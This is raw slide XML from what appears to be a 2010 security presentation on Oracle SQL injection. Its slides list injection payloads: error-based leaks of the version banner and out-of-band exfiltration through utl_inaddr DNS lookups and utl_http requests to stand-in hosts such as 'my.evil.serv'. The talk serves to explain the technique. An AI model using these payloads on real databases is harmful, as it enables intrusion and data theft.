              <a:t>or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1))--’&amp;pass=</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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Bl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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>zzZZzzZZ</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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D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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="fr-FR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="636466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or 1=utl_inaddr.get_host_address((select ‘my’ from dual)||‘.evil.dns.com’)- -’</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="fr-FR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="636466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or 1=(select utl_http.request() from dual)- -’</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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20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57EC-B83E-4E4F-A0C1-92527BD78BD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CAD8C31-90BB-4487-B61D-DB77CE410E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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SQL Injection in Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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202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202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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Check the availability of the http Return channel</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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or  1=(select utl_http.request(‘my.evil.serv:port/ping’) from dual)--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202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202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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Use nested queries to export data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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or 1=(select utl_http.request(‘my.evil.serv:port/’ || (select string from table) from dual)--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imited to a single String : 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C445-A7DA-475C-844E-5CA60BA8CDA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BCF7146-EB43-4A42-A6EA-743C3BF32B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08:21:13Z</dcterms:created>
  <dc:creator>eal</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>eal</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-01-18T15:34:46Z</dcterms:modified>
  <cp:revision>16</cp:revision>
  <dc:subject/>
  <dc:title>Oracle : A new Hop</dc:title>
</cp:coreProperties>
</file>